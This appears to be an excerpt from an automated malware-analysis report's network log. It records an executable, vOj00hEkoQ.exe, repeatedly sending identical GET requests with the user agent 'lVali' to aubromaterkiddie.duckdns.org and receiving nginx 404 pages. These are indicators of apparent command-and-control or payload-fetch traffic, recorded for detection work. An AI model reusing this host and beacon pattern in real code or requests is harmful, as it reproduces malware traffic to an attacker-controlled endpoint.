                Session IDSource IPSource PortDestination IPDestination PortProcess
                65192.168.2.649851208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:31 UTC27OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:31 UTC27INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:31 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:31 UTC27INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                66192.168.2.649857208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:32 UTC27OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:32 UTC28INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:32 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:32 UTC28INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                67192.168.2.649858208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:32 UTC28OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:32 UTC28INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:32 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:32 UTC28INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                68192.168.2.649859208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:33 UTC28OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:33 UTC28INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:33 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:33 UTC29INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                69192.168.2.649860208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:34 UTC29OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:34 UTC29INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:34 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:34 UTC29INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.649760208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:33 UTC2OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:33 UTC3INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:33 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:33 UTC3INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                70192.168.2.649862208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:35 UTC29OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:35 UTC29INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:35 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:35 UTC29INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                71192.168.2.649863208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:36 UTC30OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:36 UTC30INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:36 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:36 UTC30INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                72192.168.2.649864208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:37 UTC30OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:37 UTC30INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:37 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:37 UTC30INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                73192.168.2.649865208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:38 UTC30OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:38 UTC31INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:38 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:38 UTC31INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                74192.168.2.649867208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:40 UTC31OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:40 UTC31INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:40 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:40 UTC31INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                75192.168.2.649868208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:41 UTC31OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:41 UTC31INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:41 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:41 UTC31INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                76192.168.2.649870208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:41 UTC32OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:42 UTC32INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:42 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:42 UTC32INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                77192.168.2.649871208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:42 UTC32OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:42 UTC32INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:42 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:42 UTC32INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                78192.168.2.649872208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:44 UTC32OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:44 UTC33INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:44 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:44 UTC33INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                79192.168.2.649873208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:46 UTC33OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:46 UTC33INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:46 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:46 UTC33INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.649764208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:34 UTC3OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:34 UTC3INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:34 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:34 UTC3INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                80192.168.2.649874208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:47 UTC33OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:47 UTC33INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:47 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:47 UTC34INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                81192.168.2.649875208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:47 UTC34OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:47 UTC34INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:47 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:47 UTC34INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                82192.168.2.649876208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:48 UTC34OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:48 UTC34INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:48 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
